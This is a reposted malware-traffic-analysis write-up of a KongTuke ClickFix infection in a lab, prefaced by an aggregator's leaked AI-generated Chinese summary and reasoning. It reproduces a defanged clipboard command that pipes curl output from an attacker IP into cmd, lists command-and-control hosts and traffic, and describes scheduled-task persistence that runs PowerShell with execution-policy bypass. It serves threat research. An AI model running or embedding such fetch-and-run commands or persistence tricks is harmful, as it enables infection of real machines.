2026-01-08: KongTuke ClickFix activity
好的,我现在需要帮用户总结一篇文章的内容,控制在100字以内。首先,我得仔细阅读用户提供的文章内容,理解其主要信息。 文章看起来是关于KongTuke活动的ClickFix恶意活动的详细记录。里面提到了密码保护的ZIP文件、注入的脚本、恶意软件的行为以及持久化机制。还有涉及多个文件和网络请求,比如恶意Python和Figma包,以及创建的任务来保持恶意软件的持续性。 接下来,我需要提取关键点:KongTuke活动、ClickFix机制、注入脚本、恶意软件传播、持久化任务等。然后用简洁的语言把这些点连贯起来,确保不超过100字。 可能会遇到的问题是如何在有限的字数内涵盖所有重要信息而不遗漏关键细节。我需要选择最重要的部分,比如恶意软件如何传播、注入脚本的作用以及它如何保持持久性。 最后,确保语言流畅自然,避免使用复杂的术语或结构,让用户能够轻松理解。 </think> 文章描述了KongTuke ClickFix恶意活动,涉及通过注入脚本和密码保护的ZIP文件传播恶意软件。该活动利用合法但被妥协的网站分发恶意代码,并创建持久化任务以维持感染。 2026-1-8 20:29:0 Author: www.malware-traffic-analysis.net(查看原文) 阅读量:5 收藏

2026-01-08 (THURSDAY): KONGTUKE CLICKFIX ACTIVITY

NOTICE:

  • Zip files are password-protected.  Of note, this site has a new password scheme.  For the password, see the "about" page of this website.

ASSOCIATED FILES:

2026-01-08 (THURSDAY): KONGTUKE CLICKFIX ACTIVITY

NOTES:

- This was done with a client on a domain controller in my lab, using the domain furtherningthemagic[.]com.
- The furtherningthemagic[.]com domain I used was unregistered at the time of this activity.
- I modified the the pcaps to disguise the location and characteristics of the infected host.

EXAMPLE OF LEGITIMATE BUT COMPROMISED SITE WITH INJECTED SCRIPT:

- [information removed]

EXAMPLE OF TRAFFIC FOR KONGTUKE CLICKFIX CAPTCHA PAGE:

- hxxps[:]//frttsch[.]com/2w2w.js
- hxxps[:]//frttsch[.]com/js.php?device=windows&ip=[base64 text removed]&refferer=[base64 text removed]&
  browser=[base64 text removed]&ua=[base64 text removed]&domain=[base64 text removed]&
  loc=[base64 text removed]=&is_ajax=1

CLICKFIX SCRIPT INJECTED INTO VIEWER'S CLIPBOARD:

- cmd.exe /c start "" /min cmd /k 
  "curl hxxp[:]//144.31.221[.]60/a | 
  cmd && exit"

POST-INFECTION TRAFFIC:

- 15:54:44 UTC - 144.31[.]221.60:80 - 144.31[.]221.60 - GET /a
- 15:54:45 UTC - 144.31[.]221.60:80 - 144.31[.]221.60 - GET /b
- 15:54:51 UTC - 144.31[.]221.60:80 - 144.31[.]221.60 - POST /n
- 15:54:52 UTC - 64.95.13[.]101:80 - 64.95.13[.]101 - GET /jdf7r4egas5.html
- 15:54:52 UTC - 144.31.221[.]71:80 - 144.31.221[.]71 - GET /final10
- 15:55:07 UTC - 104.16.230[.]132:80 - combining-space-organization-correction.trycloudflare.com - POST /qFiwVIIzHUzJFR
- 15:55:29 UTC - 103.27.157[.]146:4444 - TCP traffic
- 16:05:56 UTC - 103.27.157[.]146:4444 - TCP traffic
- 16:08:24 UTC - 64.190.113[.]206:79 - checkifhuman[.]top - traffic using Finger protocol
- 16:12:49 UTC - 64.52.80.153:80 - ey267te[.]top - GET /1.php?s=63e95be1-92e0-45c1-a928-65d63b17cd1c
- 16:12:50 UTC - 45.61.136[.]222:80 - bz1d0zvfi03yhn1[.]top - GET /1.php?s=04e1ab2b-3f93-46fa-9aed-c3a2a3f126c9
- 16:12:51 UTC - 64.52.80.153:80 - fnjnbehjangelkd[.]top - GET /txoidka8bfhtr.php?[victim's host name]&key=
                                                         43333495587&s=63e95be1-92e0-45c1-a928-65d63b17cd1c
- 16:13:00 UTC - 173.232.146[.]62:25658 - TLSv1.0 traffic
- 16:13:01 UTC - api.ipify[.]org - HTTPS traffic
- 16:13:03 UTC - 45.61.136[.]222:80 - bz1d0zvfi03yhn1[.]top - GET /st2?s=04e1ab2b-3f93-46fa-9aed-c3a2a3f126c9&id=
                                                            [victim's host name]&key=[11-digit string]
- 16:13:04 UTC - 45.61.136[.]222:80 - bz1d0zvfi03yhn1[.]top - GET /getarchive
- 16:13:35 UTC - 45.61.136[.]222:80 - bz1d0zvfi03yhn1[.]top - GET /installreport?r=0&hash=
                                                            1DD91BA2F56CED5AF731E67121619D6A9EF2CBB8F1524989FC542EF904605908
- 16:13:35 UTC - 45.61.136[.]222:80 - bz1d0zvfi03yhn1[.]top - GET /archivehash
- 16:13:36 UTC - 45.61.136[.]222:80 - bz1d0zvfi03yhn1[.]top - GET /installreport?r=0&hash=
                                                            1DD91BA2F56CED5AF731E67121619D6A9EF2CBB8F1524989FC542EF904605908
- 16:16:12 UTC - 173.232.146[.]62:25658 - TLSv1.0 traffic
- 16:16:13 UTC - api.ipify[.]org - HTTPS traffic
- 16:16:15 UTC - 173.232.146[.]62:25658 - TLSv1.0 traffic
- 16:16:16 UTC - 173.232.146[.]62:25658 - TLSv1.0 traffic
- 16:16:21 UTC - checkip.dyndns[.]org - GET /
- 16:16:21 UTC - ipinfo[.]io - GET /[victim's IP address]/city
- 16:16:21 UTC - ipinfo[.]io - GET /[victim's IP address]/region
- 16:16:21 UTC - ipinfo[.]io - GET /[victim's IP address]/country
- 16:16:28 UTC - 173.232.146[.]62:25658 - TLSv1.0 traffic

INTIAL DOWNLOADED ZIP ARCHIVE:

- SHA256 hash: d22b9d30b89d99ad80d1ee081fd20518985c1bc4e37b5e105bcc52231509fa25
- File size: 25,469,825 bytes
- File type: Zip archive data, at least v2.0 to extract, compression method=deflate
- File location: hxxp[:]//144.31.221[.]71/final10
- Extracted to: C:\Users\[username]\AppData\Local\Microsoft\Windows\SoftwareProtectionPlatform\
- Description: Malicious Python package 
- First submitted to VirusTotal: 2026-01-08

FOLLOW-UP ZIP ARCHIVE:

- SHA256 hash: 1dd91ba2f56ced5af731e67121619d6a9ef2cbb8f1524989fc542ef904605908
- File size: 205,346,282 bytes
- File type: Zip archive data, at least v2.0 to extract, compression method=deflate
- File location: hxxp[:]//bz1d0zvfi03yhn1[.]top/getarchive
- Extracted to: C:\Users\[username]\AppData\Roaming\figmaUpdater\
- Description: Malicious Figma package
- First submitted to VirusTotal: 2025-10-09

SCHEDULED TASKS TO KEEP THE MALWARE PERSITENT:

- Task name: SoftwareProtection
- Trigger: After installation/running, then repeat every 5 minutes indefinitely
- Command: C:\Users\gtimmons\AppData\Local\Microsoft\Windows\SoftwareProtectionPlatform\run.exe
- Arguments: C:\Users\gtimmons\AppData\Local\Microsoft\Windows\SoftwareProtectionPlatform\udp.pyw

- Task name: Remove-NetNatStaticMapping
- Trigger: After installation/running, then repeat every 3 minutes indefinitely
- Command: conhost
- Arguments: --headless powershell -ep bypass /f 
             "C:\Users\[username]\AppData\Local\Microsoft\AppActions\AzureRemove-NetNatStaticMapping.ps1"

FILES IN DIRECTORY REFERENCED BY SECOND SCHEDULED TASK:

- SQLite 3.x database:    C:\Users\[username]\AppData\Local\Microsoft\AppActions\ActionFXCache.db
- data:                   C:\Users\[username]\AppData\Local\Microsoft\AppActions\ActionFXCache.db-shm
- SQLite Write-Ahead Log: C:\Users\[username]\AppData\Local\Microsoft\AppActions\ActionFXCache.db-wal
- ASCII text:             C:\Users\[username]\AppData\Local\Microsoft\AppActions\AzureRemove-NetNatStaticMapping.ps1
- data:                   C:\Users\[username]\AppData\Local\Microsoft\AppActions\Remove-NetNatStaticMapping.log

OTHER DIRECTORIES WITH CONTENT CREATED DURING THIS INFECTION:

- C:\Users\[username]\AppData\Roaming\figmaUpdater\
- C:\Users\[username]\AppData\Local\Microsoft\Windows\SoftwareProtectionPlatform\

IMAGES


Shown above:  Fake CAPTCHA window and ClickFix script after visiting legitimate, but compromised website.


Shown above:  Traffic from the infection filtered in Wireshark, part 1 of 2.


Shown above:  Traffic from the infection filtered in Wireshark, part 2 of 2.


Shown above:  Scheduled task created during the initial infection.


Shown above:  Scheculed task created during the follow-up infection.

Click here to return to the main page.


文章来源: https://www.malware-traffic-analysis.net/2026/01/08/index.html
如有侵权请联系:admin#unsafe.sh